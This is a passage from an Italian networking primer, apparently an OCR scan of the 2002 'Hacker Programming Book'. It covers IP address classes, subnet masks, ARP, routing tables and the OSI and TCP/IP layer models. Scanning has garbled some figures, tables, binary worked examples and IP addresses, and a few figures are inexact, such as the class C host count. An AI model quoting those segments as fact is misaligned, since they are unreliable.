creare un sistema che permettesse in una rete pubblica di scambiare in modo veloce ed 
affidabile delle risorse esistenti su diversi computer. 

La sua idea fu quella di suddividere queste informazioni in messaggi uniformi in modo tale 

che ciascun computer potesse gestire contemporaneamente la ricezione e l'invio di diversi 

messaggi suddividendo il tempo di elaborazione per ciascuno di questi. 

Queste parti di messaggio furono definite con il termine di pacchetto. 

Le prime implementazioni di un meccanismo utilizzabile per una gestione di questo tipo fu 

quella che passò dalla fase teorica a quella pratica verso la fine degli anni 60 all'interno di 

quella che venne chiamata Arpanet. 
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Nel frattempo erano comparse un certo numero di reti differenti le quali fecero subito sentire 

la necessità di creare un protocollo che permettesse il dialogo di queste. 

Arpanet come protocollo aveva introdotto alcuni concetti fondamentali per quello che avrebbe 

dovuto essere l'internetworking e precisamente il layering, o stratificazione, e la 

virtualizzazione. 

Tutte le varie problematiche presenti nell'ambito di quello che dovrebbe essere il meccanismo 
di trasferimento delle informazioni in un ambito di internetworking possono essere suddivise 
in un certo numero di strati di rete. 

Ciascuno di questi strati dispone di sistemi particolari ciascuno dei quali regola certe 
funzionalità. 

Come vedrete successivamente almeno le conoscenze di base su quelle che sono queste 
stratificazioni non possono essere bypassate in quanto spesso questi concetti vengono 
inclusi in altre argomentazioni. 

Ad esempio quando tratteremo la libreria LIBNET ci accorgeremo che è necessario sapere 
cosa sono questi livelli, layers o strati o come li si vuole chiamare. 
In effetti anche dal punto di vista della ricerca dei metodi di interazione con i protocolli sarà 
necessario avere ben presente questa suddivisione. 

Oltre ai concetti funzionali legati a questi strati esistono legami specifici anche con i protocolli 
in quanto all'interno di ciascun strato ne esistono di particolari molti dei quali tutti conoscono. 
La descrizione precisa viene fatta dentro ai files RFC i quali sono esposti su appositi siti 
internet. 

La rete come abbiamo detto è di fatto un sistema adatto al trasferimento delle informazioni tra 
un sistema ed un altro e quindi la cosa che risulta essere sicuramente necessaria è un 
meccanismo che permetta di identificare in modo univoco ogni singolo sistema collegato a 
questa. 

□SI 
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Questo numero è quello che di regola siamo abituati a chiamare IP il quale è legato a quelli 
che a sua volta chiamiamo con il termine di HOST. 

Un host di fatto è qualsiasi cosa che agganciato ad una rete è in grado di ricevere e 
trasmettere dei pacchetti IP come ad esempio un router, una workstation e così via. 
Un indirizzo IP è un numero a 32 BITS composto da due parti e precisamente da un 
identificatore di rete e da un numero di sistema su questa. 

Nei sistemi in cui esisteva una sola rete sarebbe stato possibile usare un semplicissimo 
numero per identificare il sistema. 

La possibilità di dialogo tra reti differenti ha reso necessaria l'implementazione anche di un 
identificatore che permettesse non solo di identificare il sistema ma anche la rete stessa. 



FTP. Telnet, 
SMTP. SlNMP 



NFS 



XDR 



RPC 



TCP. UOP 
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ICMP 



ARP. RARP 
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Di regola siamo abituati a vedere gli IP espressi come quattro numeri di tre cifre al massimo 
come ad esempio : 

212.210.165.131 

Gli indirizzi validi in teoria potrebbero essere tutti i numeri compresi tra 0.0.0.0 e 
255.255.255.255 ovvero 4.3 miliardi di numeri ma poi in pratica solo un parte di questi 
possono essere usati in sistemi come ad esempio Internet. 



Class Prefix Network Number Host Number 

A 0 Bits 0-7 Bits 8-31 

B 10 Bits 1-15 Bits 16-31 

C 110 Bits 2-24 Bits 25-31 

D 1110 N/A 

E 1111 N/A 



Chiaramente in un sistema dove una parte viene destinata all'identificazione della rete mentre 
l'altra a quella del host il numero di sistemi rappresentabili in un ambito di un'unica rete può 
variare in base a quanti bits vengono riservati per la rappresentazione di una parte e 
dell'altra. 

Questi dimensionamenti differenti permettono la creazione di reti di classe differente con 
ciascuna di queste dotata della possibilità di supportare un certo numero di hosts. 
A seconda dell' esigenza di una certa società di supportare un certo numero di sistemi è 
possibile adottare reti di una certa classe. 
L'ente che assegna gli indirizzi è il NIC. 

In base alla grandezza della società' gli viene assegnata una rete di classe differente. 

In base al numero dei segmenti che costituiscono la rete ed al numero dei nodi esistono tre 

classi di reti e precisamente : 



CLASSE 




FORMATO 






NUM. MAX RETI 


NUM. MAX NODI 


CLASSE 


A 


Rete. Nodo 


Nodo 


Nodo 


127 


16. 777.216 


CLASSE 


B 


Rete .Rete 


Nodo 


Nodo 


16.384 


65.534 



Nel caso di una rete di classe A i primi otto bits, quelli assegnati, corrispondenti al numero del 

segmento di rete possono assumere valori compresi tra 0 e 126 (vedremo che gli altri 

vengono utilizzati per motivi particolari) per cui e' possibile implementare 127 reti di classe A. 

Le società' con reti appartenenti a questa classe sono IBM, HP, APPLE ecc. (considerate che 

ce ne sono solo 127 indirizzi di classe A). 

Microsoft sono invece esempi di indirizzi di reti di classe B. 

Gli indirizzi di classe C possiedono invece le prime tre quartine assegnate dal NIC. 

Di fatto esiste anche una classe D i cui indirizzi sono utilizzati per il multicast. 

Un indirizzo multicast e' un intervallo compreso tra 224.0.0.0 e 239.255.255.255. 

La trasmissione multicast si basa sulP identificazione di tutti i router di una rete ed e' 

finalizzata ad inviare i dati verso più' destinazioni. 

Esistono alcuni indirizzi che possiedono scopi particolari come ad esempio : 

127.0.0.1 Funzione di circuito chiuso in cui ogni messaggio viene rispedito al mittente. 

x.y.z.255 Valore di broadcast che viene utilizzato per inviare un pacchetto a tutti i sistemi di una sotto rete. 



Normalmente quasi tutte le reti sono in classe C ovvero con la possibilità di supportare 255 
hosts nella stessa rete ma in ogni caso esistono anche reti di dimensioni maggiori, come ad 
esempio quella IBM, che sono appartenenti a classi differenti come appunto in classe A. 
Il numero di rete e di sistemi supportati sono per ciascuna classe : 



Class Range of Net Numbers Range of Host Numbers 

A 0 to 126 0.0.1 to 255.255.254 

B 128.0 to 191.255 0.1 to 255.254 

C 192.0.0 to 254.255.255 1 to 254 
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Qualsiasi indirizzo che parte con il numero 127 è considerato come indirizzo di loopback e 
non deve essere utilizzato per l'indirizzamento al di fuori dell'host. 

Un numero d'host composto in binario da tutti numero 1 è detto indirizzo di broadcast e serve 
ad inviare quel pacchetto a tutti i sistemi connessi a quella particolare rete. 
Una rete di quelle in genere utilizziamo adottano il formato Ethernet il quale a livello di scheda 
utilizzano un indirizzo composto da sei numeri esadecimali separati dal segno - come ad 
esempio 02-FE-87-4A-8C-A9. 



15 



?3 



31 



Network 



Host 



Host 



Host 



0 1 



Figura 1 Indirizzo in classe A 
7 15 23 



31 



Network 



Network 



Host 



Host 
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Figura 2 Indirizzo in classe B 
7 15 23 



31 



Network 



Network 



Network 



Host 



Figura 3 Indirizzo in classe C 



Le maschere di sottorete indicano quali bit di un indirizzo IP rappresentano la porzione della 
rete e quali rappresentano invece la porzione dell'host. 

Con gli indirizzi IP di Classe A,B, e C si utilizzano maschere di sottorete predefinite, nel modo 
che segue: 

-Classe A -255.0.0.0 
- Classe B- 255.255.0.0 



La maschera di sottorete di Classe A dice che i primi 8 bit dell'indirizzo IP rappresentano la 
porzione della rete dell'indirizzo. 

I rimanenti 24 bit rappresentano la porzione dell'host dell'indirizzo. 
Diciamo che un host abbia l'indirizzo IP 1 1 .25.65.32. 

Usando la maschera di sottorete predefinita, l'indirizzo della rete sarebbe 11.0.0.0 e la 
componente dell'host sarebbe 25.65.32. 

La maschera di sottorete di Classe B dice che i primi 16 bit dell'indirizzo IP rappresentano la 
porzione della rete dell'indirizzo. 

I rimanenti 16 bit rappresentano l'indirizzo dell'host all'interno della rete. 

Se un host avesse l'indirizzo IP 172.16.33.33, la porzione della rete dell'indirizzo sarebbe 

172.16.0.0 e la componente dell'host sarebbe 33.33. 

La maschera di sottorete di Classe C dice che i primi 24 bit dell'indirizzo IP rappresentano la 
porzione della rete dell'indirizzo. 

I rimanenti 8 bit rappresentano l'indirizzo dell'host all'interno della rete. 

Se un host avesse l'indirizzo IP 192.168.2.3, la porzione della rete dell'indirizzo sarebbe 

1 92.1 68.2.0 e la componente dell'host sarebbe 3. 

Quando un host mittente cerca di comunicare con un host destinatario, usa la sua maschera 
di sottorete per determinare se l'host destinatario si trova sulla rete locale o su di una rete 
remota. 

Questo processo é conosciuto con il nome di messa in AND. 
La funzione di messa in AND gode delle seguenti proprietà: 
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se i due valori confrontati sono entrambi 1 , il risultato è 1 ; 
se uno dei due valori é 0 e l'altro é 1 , il risultato é zero; 



Come si può facilmente notare, il funzionamento é il medesimo dell'AND operatore 
nell'algebra booleana. 

Gli indirizzi IP dell'origine e della destinazione, sono confrontati con la maschera di sottorete 

dell'origine per mezzo del processo di messa in AND. 

Per ciascuno dei due indirizzi, si crea un risultato AND. 

Se questi sono uguali significa che gli host si trovano sulla stessa rete. 

Se invece questi risultati AND sono diversi, significa che l'host destinatario si trova su una 

rete remota. 

Tutto il traffico destinato a quell'host remoto, 

dovrebbe dirigersi verso il router indicato nella tabella di instradamento (routing) dell'host 
origine. 

Per fare un esempio supponiamo di avere due host. 
Host A 

IP (dee): 172.16.2.4 

IP (bin): 101011 00 0001 0000 0000001 0 000001 00 
SNM: 255.255.0.0 
Host B 

IP (dee): 172.16.3.5 

IP (bin): 10101100 00010000 00000011 00000101 



Se si effettua il processo di messa in AND, il risultato per l'host A (utilizzando la sua 
maschera di sottorete 255.255.0.0) è ciò che segue: 



Indirizzo IP dell'host A 1 01 01 1 00 0001 0000 0000001 0 000001 00 
Maschera di sottorete dell'host A 1 1 1 1 1 1 1 1 11111111 00000000 00000000 
Risultato della messa in AND 101011 00 0001 0000 00000000 00000000 



Il risultato per l'host B, si può vedere invece qui sotto 



Indirizzo IP dell'host B 1 01 01 1 00 0001 0000 0000001 1 000001 01 
Maschera di sottorete dell'host A 1 1 1 1 1 1 1 1 11111111 00000000 00000000 
Risultato della messa in AND 101011 00 0001 0000 00000000 00000000 



Come si può facilmente notare, i due risultati corrispondono. 

Questo indica che, per quanto riguarda l'host A, i due host si trovano sulla stessa rete fisica. 

Le comunicazioni possono quindi svolgersi direttamente tra i due host. 

La maschera di sottorete dell'host B, infatti, è la medesima dell'host A. 

Per riuscire ad eseguire l'abbinamento del numero di IP usato dal protocollo IP e questo 

indirizzo Ethernet viene utilizzato il protocollo ARP il quale significa Address Resolution 

Protocol. 

Questo protocollo tiene in una cache la tabella di abbinamento di questi due metodi di 
specifica degli indirizzi. 



/IP address Ethernet address \ 



1223.1.2.1 08-00-39-00-2F-C3I 

1223.1.2.3 08-00-5A-21-A7-22 I 

1223.1.2.4 08-00-10-99-AC-54I 
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Supponiamo di gestire una rete con tre host collegati. 

Quando inizialmente il primo host cerca di inviare un pacchetto IP al terzo, il protocollo ARP 

su questo sistema cerca di trovare l'indirizzo Ethernet abbinato a questo IP non trovandolo in 

quanto fino ad ora non c'e' stato nessun altro tentativo di comunicare. 

Il protocollo ARP invia un pacchetto con un indirizzo di broadcast che tutti i sistemi sulla rete 

ricevono. 

Se il sistema che riceve questo pacchetto ha l'IP specificato, che in questo caso è il terzo, 
restituisce al primo sistema un pacchetto di replica in cui c'e' l'indirizzo Ethernet il quale lo 
prende e lo salva dentro alla tabella per poi successivamente utilizzarlo per inviare i pacchetti 
dal primo sistema al terzo. 

Questa tabella in molti casi è salvata in modo statico e viene mantenuta fino a quando per 
qualche motivo non viene svuotata. 

Consideriamo ora il caso di due reti separate connesse insieme da un PC il quale ha a 
funzione del router. 



2oat.ii 



200.1.2.3 



NETWORK Z0O.1.Z 




2O0.1.2.3 




□ 



2O0.1.Ì.3 



2DD..1.3.10 



□ 



NETWORK 200.1.3 



La funzione del router è quella di selezionare un percorso da fare prendere ad un pacchetto 
analizzando l'indirizzo di destinazione e la tabella di instradamento di questo ovvero il 
percorso che deve essere fatto fare a questo per raggiungere un determinato sistema. 
Essendo due reti separate ciascuna di queste possiede all'interno del proprio IP il numero 
che la identifica. 

Questa scelta è necessaria in quanto il router deve sapere quale interfaccia utilizzare per 
raggiungere un nodo specifico e di fatto ogni numero di rete è abbinato ad una di queste. 
Se il sistema A vuole inviare un pacchetto al sistema E dovrà prima inviarlo al sistema C il 
quale eseguirà il forward di questo al sistema E. 

Il sistema C invierà il pacchetto ad E usando il suo indirizzo Ethernet presente dentro alla 
cache del protocollo ARP. 

Sono stati riservati tre gruppi di indirizzi IP per l'uso sulle reti locali, dietro ai firewall ed ai 
server proxy. 

Eccoli elencati qui di seguito: 

•da 10.0.0.0 a 10.255.255.255; 
• da 1 72.1 6.0.0 a 1 72.31 .255.255; 



Questi indirizzi sono stati creati per fornire alle reti non collegate ad Internet, un gruppo di 
indirizzi IP che non fossero in conflitto con quelli attualmente in uso sulla Rete. 
Qualora le reti che si servono di questi indirizzi riservati dovessero un domani slacciarsi ad 
Internet, non avrebbero da preoccuparsi del fatto che qualche indirizzo possa essere 
conflittuale con qualche altra rete su Internet. 



Inizialmente abbiamo detto che la rete può essere considerata una stratificazione di diversi 
protocolli ciascuno dei quali si interessa di gestire una determinata funzionalità. 
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Sicuramente una di quelle fondamentali è quella che gestisce l'instradamento dei pacchetti di 
dati detto normalmente IP ROUTING. 

Infatti quello che generalmente pensiamo essere un solo protocollo, TCP/IP, di fatto è 
composto da due protocolli tra i quali IP che è appunto il protocollo di instradamento. 
Quella che noi siamo abituati a definire con il termine di rete è di fatto un insieme di strati su 
ciascuno dei quali determinati protocolli svolgono le funzioni necessarie per il corretto 
funzionamento di tutti i servizi che siamo abituati ad utilizzare come ad esempio quelli di 
navigazione, della posta elettronica e così via. 

Indipendentemente dal tipo di questi, una cosa che è necessario comprendere è che le 
informazioni trasmesse vengono spedite a blocchi all'interno di quelli che vengono definiti 
come pacchetti i quali partono da un sistema d'origine e passando attraverso un certo 
numero di altri raggiungono la destinazione sulla quale vengono ricomposti e utilizzati per lo 
scopo per cui sono stati originati. 

Questa definizione porta a comprendere che di fatto i pacchetti seguono un percorso, per cui 
all'interno del sistema di rete deve necessariamente esistere un meccanismo che permette di 
gestire quello chiamato con il termine di instradamento o routing. 

I meccanismi presenti ai livelli più bassi sono quelli che regolano il funzionamento legato al 
trasferimento delle informazioni indipendentemente dalla tipologia di servizio a cui queste 
sono relative. 

Normalmente siamo abituati a riferirci al protocollo TCP/IP che di fatto è una suite di diversi 

altri, tra cui IP il quale è quello che si interessa di instradare i pacchetti di dati. 

I routers di fatto sono i meccanismi hardware che si interessano di gestire le strade 

telematiche che i pacchetti seguono per passare da un sistema mittente ad uno di 

destinazione. 

Questi prendono la decisione di dove inviare i pacchetti, analizzando la loro testata 
contenente le informazioni e valutando le tabelle di instradamento gestite dai routers stessi. 
Mentre fino ad un po' di tempo fa gli hackers prendevano di mira i WEB servers ora hanno 
spostato la mira verso i routers e quello definito con il termine di BGP (Border Gateway 
Protocol) il quale si interessa di traslare le tabelle di routing tra i vari sistemi venduti da 
diverse società. 

Esiste un comando all'interno dei sistemi operativi che permette di stampare la tabella di 
routing e precisamente : 



Il risultato dà una tabella come la seguente : 
C: \>route print 



Interface List 

Oxl MS TCP Loopback interface 

0x2 . . . 00 aO 24 e9 cf 45 3Com 3C90x Ethernet Adapter 

0x3 . . .00 53 45 00 00 00 NDISWAN Miniport 

0x4 . . .00 53 45 00 00 00 NDISWAN Miniport 

0x5 . . .00 53 45 00 00 00 NDISWAN Miniport 

0x6 . . .00 53 45 00 00 00 NDISWAN Miniport 



Active Routes: 

Network Destination Netmask Gateway Interface Metric 
0.0.0.0 0.0.0.0 10. 99. 99.254 10.99.99.1 1 

10.99.99.0 255.255.255.0 10.99.99.1 10.99.99.1 1 

10.99.99.1 255.255.255.255 127.0.0.1 127.0.0.1 1 
10.255.255.255 255.255.255.255 10.99.99.1 10.99.99.1 1 
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 
224.0.0.0 224.0.0.0 10.99.99.1 10.99.99.1 1 
255.255.255.255 255.255.255.255 10.99.99.1 10.99.99.1 1 
Default Gateway: 10 . 99. 99.254 



Persistent Routes: 
None 
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Il CERT (Computer Emergency Response Team) ha recentemente rilasciato un documento 
dove veniva mostrato come sta diventando sempre maggiore l'interesse degli hackers nei 
confronti di questo dispositivo. 

Compromettere il funzionamento di uno di questi sistemi significa in pratica coinvolgere una 
serie di meccanismi il cui scorretto funzionamento potrebbe causare problemi di sicurezza o 
anche solo di prestazioni della rete stessa. 

Già normalmente, senza parlare di cattivi funzionamenti, la corretta programmazione di un 
router porta a migliorare notevolmente le prestazioni nell'ambito dei trasferimenti dei 
pacchetti. 

Quando si utilizza uno di questi, la lettura e la comprensione dei documenti forniti insieme è il 
primo passo per una corretta configurazione e quindi di conseguenza la limitazione delle 
probabilità che questi siano causa di certi problemi. 

Alcune volte gli hacker possiedono effettivamente la capacità di teorizzare e successivamente 
di realizzare degli attacchi ma nella maggior parte dei casi gli accessi indesiderati o 
comunque le manomissioni dei sistemi informatici avvengono a causa della presenza di bugs 
nell'ambito dei sistemi operativi, dei servers e dei sistemi hardware che li gestiscono. 
Avere l'accortezza di seguire giorno dopo giorno le informazioni rilasciate dalle case 
costruttrici e il fatto d'installare prontamente le hotfix e le patchs significa evitare un 
grossissima percentuale di problemi di questo tipo. 

Spesso quando si acquistano linee dedicate da società come Interbusiness, del gruppo 
Telecom, i routers vengono forniti da queste e la loro programmazione diventa impossibile in 
quanto l'accesso alle funzioni di configurazione non sono consentite se non ai centri di 
gestione della società stessa. 

Questi aggiornamenti non sono solo da considerare nell'ambito dei servers, dei sistemi 
operativi o comunque di software che girano sui sistemi in rete ma anche nei sistemi di 
gestione di questi strati. 

Avrete sicuramente sentito parlare di bugs del software BIND, delle varie versioni di Ipv4 e 
Ipv6. 

Insomma spesso le problematiche possono essere presenti anche nei software che 
gestiscono i protocolli a qualsiasi livello questi siano. 

Ma la rete, ritornando al discorso vero e proprio legato all'argomento di questo capitolo, di 
quanti protocolli è composta ? 

Internet è un packet-switched network alla quale esistono due tipi di approcci comuni. 
Il primo è un circuito virtuale su cui avviene il packet switching anche conosciuto come 
servizio di rete orientato alla connessione. 

Il secondo è invece quello dello switching di datagrammi che al contrario di quello precedente 
costituisce un tipo di servizio di rete non basato sulla connessione. 

Nel primo caso il sistema che garantisce la connessione è sempre attivo mentre nel secondo 
L'invio dei pacchetti può avvenire in qualsiasi istante anche in modo completamente 
asincrono. 

Nel primo tipo di circuito, ovvero quello definito con il termine di Virtual Circuit Packet 
Network, viene utilizzata una fase iniziale per settare un instradamento fisso tra i nodi 
intermedi per tutti i pacchetti che vengono scambiati durante una sessione tra nodi terminali, 
come ad esempio avviene nelle reti telefoniche. 




Questa tipologia di circuito opera stabilendo una connessione tra dure devices nella 
comunicazione. 

Quando un device inizia una sessione negozia i parametri di comunicazione come ad 
esempio la massima dimensione di un messaggio, la dimensione di una finestra e il percorso 
di rete. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



E | D | C | E J"A"| Originai Mcssagc 



A 



Mescage Fngments 





M*s s agc Fragmcntf 



Rcasscmbkd Mcssagc | h, |U | C| bijfr| 



Il discorso della dimensione di una finestra è collegato al concetto di quelle cohe sono le 
finestre rotanti all'interno di certi protocolli di comunicazione. 

In pratica la connessione viene suddivisa in un certo numero di spicchi o finestre dentro alle 
quali vengono memorizzati i dati ricevuti in modo tale che poi questi possano essere 
ricomposti nella giusta sequenza. 

In caso di errore della trasmissione di certi dati solo la finestra interessata verrà richiesta 
nuovamente. 

Spesso i protocolli che gestiscono questo meccanismo sono in grado di alterare 
dinamicamente le dimensioni di queste finestre in base alla valutazione statistiche legate agli 
errori ricevuti. 

Maggiore è la quantità di errori minore è la dimensione delle finestre in modo tale che i dati 
che devono essere ritrasmessi possano statisticamente essere di quantità inferiore del caso 
in cui a causa di un solo errore debba invece essere ritrasmessa una quantità molto 
maggiore. 

Questa negoziazione stabilisce un circuito virtuale con percorso ottimale neH'a.mbito 
dell'internetworking. 

Questo tipo di circuito ottimizza l'uso della banda abilitando molti devices sugli stessi canali 
della rete per instradare i pacchetti. 
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In qualsiasi momento uno switch può instradare i pacchetti verso differenti devices di 
destinazione aggiustando il percorso al fine di ottenere le prestazioni migliori. 
Su ogni nodo intermedio è presente una voce, in una tabella, che possiede lo scopo di 
indicare la strada per la connessione creata. 
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I pacchetti possono utilizzare una testata corta in quanto è necessaria solo l'indicazione di 
quale circuito virtuale deve utilizzare al posto degli indirizzi completi del destinatario. 
I nodi intermedi processano ogni pacchetto in accordo con le informazioni che sono salvate 
nel nodo nel momento in cui la connessione è stata stabilita. 

Possono essere anche presenti delle migliorie indirizzate a rendere più affidabili alcune cose. 
E' anche garantita la spedizione dei pacchetti in una giusta sequenza e senza errori oltre al 
fatto che venga eseguito un controllo per evitare il congestionamento. 

I ritardi sono maggiormente variabili di quelli gestiti tramite circuiti dedicati, tuttavia differenti 
circuiti virtuali possono competere per la stessa risorsa. 

È necessaria una fase di setup alla connessione e alla sconnessione prima del data transfert. 

II network più comune di questo tipo è quello X25 il quale è utilizzato in molte reti pubbliche. 
Le trasmissioni a datagramma utilizzano schemi differenti per determinare l'instradamento 
attraverso una rete di links. 

Utilizzando la trasmissione a datagramma ogni pacchetto viene trattato come un entità 
separata la quale contiene una testata o header con dentro le informazioni complete relative 
al destinatario desiderato. 

I nodi intermedi esaminano questa testata per selezionare l'apposito link più prossimo al 
destinatario. 

Con questo sistema i pacchetti non seguono un preciso una strada prestabilita ed i nodi 
intermedi, quelli denominati con il termine di routers, non richiedono di conoscere prima la 
strada che dovrà essere utilizzata. 

Un network a datagramma è analogo al fatto di spedire un messaggio come se questo fosse 

una serie di cartoline inviate tramite il normale circuito postale. 

Ogni cartolina è inviata al sistema di destinazione in modo indipendente. 

Per ricevere l'intero messaggio il destinatario deve ricevere tutte le cartoline e poi rimetterle 

nel giusto ordine. 

Non tutte queste cartoline devono essere spedite usando lo stesso metodo postale e tutte 
non sono obbligate a metterci lo stesso tempo per giungere e a destinazione. 
Sempre in questo tipo di network I pacchetti possono seguire strade differenti per raggiungere 
la loro destinazione e loro spedizione non viene garantita. 

Generalmente sono richieste delle migliorie rispetto al servizio di base e queste devono 
essere fornite dai sistemi utilizzando software aggiuntivi. 

II più comune network a datagramma è internet la quale utilizza il protocollo IP. 

Ci sono delle differenze sostanziali tra le reti a circuiti virtuali e i network a datagramma. 
La cosa che influisce maggiormente sulla complessità è la tipologia dei nodi intermedi in 
quanto nelle reti a datagramma il protocollo di collegamento è relativamente semplice mentre 
la creazione dei nodi terminali è particolarmente costosa nel caso in cui si voglia attenere un 
circuiti end-to-end nei sistemi a circuiti virtuali. 

Internet trasmette i datagrammi attraverso nodi intermedi utilizzando il protocollo IP. 

Molti user di Internet utilizzano funzioni aggiuntive come quelli ad esempio per migliorare la 

qualità nell'ambito del controllo delle sequenze e degli errori nei sistemi end-to-end. 
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Questa miglioria è quella che viene fornita mediante l'uso di un altro protocollo e 
precisamente TCP che sta per Trasmission Control Protocol. 

Avevamo già detto prima che d fatto l'abitudine di considerare un solo protocollo TCP/IP è un 
fatto derivato da falsi concetti che girano sulla rete. 

Ci sono alcune situazioni importanti nelle quali è meglio raggiungere dei compromessi tra il 

servizio a datagramma e quello a circuiti virtuali. 

Questo esempio è portato dalla trasmissione della voce digitalizzata. 

Utilizzare dei sistemi per la correzione di errori e la ricostruzione della sequenzialità può 
essere molto più dannoso nel caso in cui vi siano degli errori di qualche bits nella 
trasmissione. 

Infatti in questo caso la perdita di qualità sarebbe un danno molto minore rispetto alla perdita 
di tempo che potrebbe insorgere arrecando danno alla tonalità con cui verrebbe ricostruito il 
suono. 

Lasciando perdere per adesso questa visione della rete a basso livello possiamo iniziare a 
vedere i vari livelli che la compongono. 

Abbiamo accennato ai protocolli di base ovvero IP utilizzato per il routing e il TCP usato per il 
controllo della trasmissione. 
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Il protocollo TCP/IP, come d'altra parte molti altri protocolli , è modellato su un certo numero 
di strati o di layers e precisamente sui seguenti: 

Strato applicazione 



Questo strato è fornito dalla applicazioni che utilizzano TCP/IP per le comunicazioni. 
Per applicazione si intende un processo il quale comunica con qualche altro processo 
presente su un host differente. 

Un esempio di applicazione potrebbe essere TELNET oppure FTP. 

L' interfacciamento tra l'applicazione e lo strato di trasporto è definito da un numero di porta e 
dai sockets. 



Strato di trasporto 

Questo strato è quello che provvede al trasferimento dati end-to-end mediante l'invio di questi 

da un applicazione ad un peer remoto. 

Possono essere supportate più applicazioni simultaneamente . 

Lo strato di trasporto più comune è quello che normalmente chiamiamo con il termine di TCP 
ovvero Trasmission Control Protocol il quale fornisce un sistema per l'invio dei dati orientato 
alla connessione. 

Un altro protocollo collegato a questo strato è UDP il quale al contrario di TCP non è basato 
sulla connessione me può essere utilizzato per inviare datagrammi di dati in modo 
completamente asincrono. 
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Strato di internetworking 

Questo strato è quello definito anche con il termine di strato di internet o strato di rete. 
Questo viene utilizzato per fornire un immagine di una virtual network su un internet. 
Il protocollo IP è quello più importante di questo strato il quale è di fatto uno di quelli non 
orientati alla connessione e che non possiede neppure un sistema per il controllo degli errori. 
Queste funzionalità non previste all'interno del protocollo IP devono essere implementate in 
altri livelli più alti. 

Le funzionalità di routing sono eseguite da questo protocollo. 



Questo strato è quello definito anche con il nome di strato di link. 

Questa interfaccia può o non può provvedere ad una funzione di spedizione affidabile e può 
essere racket o stream oriented. 

Esistono un infinita' di protocolli destinati a problematiche e ad ambienti differenti. 

Molti protocolli sono particolari per ambienti LAN (Locai Area Network - reti locali), altri per 

ambienti WAN (Wide Area Network - reti geografiche) mentre altri ancora, come il TCP/IP, 

sono in grado di offrire ottime prestazioni in ambedue gli ambienti. 

La forza di TCP/IP e' dovuta proprio all' equilibrio che questo ha in ambe due gli ambienti. 

Inoltre TCP/IP funziona in modo egregio in ambiente multi piattaforma e questo costituisce un 

altro dei suoi punti di forza. 

La sua origine, come moltissime altre tecnologie legate al campo del software e dell' 
hardware, e' legata al Ministero della Difesa USA come protocollo per I' interconnessione di 
grandi mainframe. 

Inizialmente la comunicazione tra i vari sistemi della ricerca finanziata dal Pentagono era in 
funzione di una rete telematica battezzata ARPANET la quale sfruttava il protocollo NCP 
(Network Control Protocol) per l' interconnessione dei sistemi. 

Il passaggio dell' uso del protocollo da NCP a TCP su ARPANET sancì I' atto di nascita di 
Internet (nei primi mesi del 1983). 

Inizialmente TCP/IP era solo un insieme di protocolli che permettevano la connessione di 
computer differenti e di trasmettere dati tra di loro. 

I principi del protocollo TCP/IP erano stati comunque posti verso la meta' degli anno 70 da 
Vinton Cerf e Robert Kahn. 

Una volta sentii dire : "... gli standards sono belli perché ce ne sono tanti ... dovrebbe pero' 
esserci uno standard per gli standards". 

Anche nel caso delle reti si e' tentato di definire degli standards e per fare questo sono nati 
degli appositi enti competenti. 

L' autorità indiscussa nel campo delle reti e' I' ISO la quale ha emanato un modello di 
riferimento per regolare le comunicazioni tra computer mediante protocolli. 
Questo modello prende il nome di OSI (Open Systems Interconnection). 

II modello OSI e' stato progettato per aiutare i programmatori a creare applicazioni compatibili 
con diverse linee di prodotti multivendor e per fare questo prevede sette strati ognuno dei 
quali si interessa di una determinata tipologia di problematiche. 

I sette strati OSI sono i seguenti : 

strato applicazione 
strato di presentazione 
strato di sessione 
strato di trasporto 
strato di rete 

strato di collegamento dati 
strato fisico 

Esiste un altro modello di riferimento che costituisce in un certo senso la versione condensata 
del modello OSI che si chiama DoD e che contempla quattro strati anzi che sette. 
Gli strati del modello DoD sono : 

strato processo/applicazione 
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strato host-to-host 
strato internet 




Diamo nuovamente un occhiata sommaria ai sette strati del modello OSI 



Livello applicazione 

Il livello di applicazione del modello OSI e' quello in cui ritroviamo molti degli applicativi che 
sfruttano i componenti concernenti le comunicazioni. 

Tra le varie applicazioni che sfruttano questo strato troviamo i software WWW, le BBS e i 
motori di ricerca Internet come Altavista, Yahoo etc. 

1 1 livello di presentazione 

Il livello di presentazione OSI ha lo scopo di presentare i dati al livello applicazione e questo 
viene fatto mediante alcuni standard che riguardano i contenuti multimediali come ad 
esempio le immagini. 

JPEG, MPEG, MIDI ecc. sono appunto alcuni di questi standard. 

Una nota lo merita il sistema Java per la definizione dei gestori di contenuto e di protocollo 

Livello di sessione 

Nello strato di sessione OSI la comunicazione viene organizzata in base a tre diverse 
modalità ovvero la Simplex (uno trasmette e un altro riceve), la Half Duplex (invio e ricezione 
dati a turno) e la Full Duplex (mediante un controllo del flusso dei dati tutti inviano e ricevono). 
Sono inoltre gestite a questo strato I' apertura della connessione, il trasferimento dei dati e la 
chiusura della connessione. I servizi del livello di trasporto hanno il compito di suddividere e 
di riassemblare le informazioni trattate a livello superiore e di convogliarle in un unico flusso di 
dati. 

Livello di trasporto 

A questo livello ritroviamo funzionalità quali quella di inviare al mittente un avviso di ricevuta 
dei pacchetti arrivati, di ritrasmettere ogni pacchetto non ritenuto valido, ricostruire la giusta 
sequenza dei pacchetti al loro arrivo, mantenere un corretto flusso di dati per impedire 
congestioni ecc. 

Da come e' intuibile da quanto appena detto e' di questo livello il sistema di controllo degli 
errori. 

Questo strato assegna ad ogni pacchetto di dati un numero di controllo che consente di 

eseguire la verifica dei dati giunti a destinazione. 

Tra i protocolli non OSI che troviamo a questo livello ci sono : 

TCP, Novell SPX, Banyan VICP, Microsoft NetBios/NetBEUl, UDP 

Questo strato offre un livello di controllo dello spostamento delle informazioni tra sistemi. 

Strato di rete 

Definisce i protocolli di gestione del percorso sulla rete. 

Questo strato può analizzare I' indirizzo dei pacchetti per determinare il metodo di 
instradamento più corretto. 

Se un pacchetto e' destinato ad una stazione sulla rete locale viene inviato direttamente. 
Se invece il pacchetto e' indirizzato ad un sistema presente su una rete posta su un altro 
segmento il pacchetto viene inviato ad un dispositivo chiamato router che si occupa di 
immetterlo in rete. 

I router, in breve, sono dispositivi che collegano la rete locale a quella geografica 
I protocolli che utilizzano questo strato sono : 

IP (Internet Protocol), X25, Novell IPX, Banyan VIP 
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Ogni segmento che appartiene ad una rete (per segmento possiamo concepirla come una 
sotto rete) ha almeno un router che gli permette di dialogare con altre sotto reti. 

Strato di collegamento 

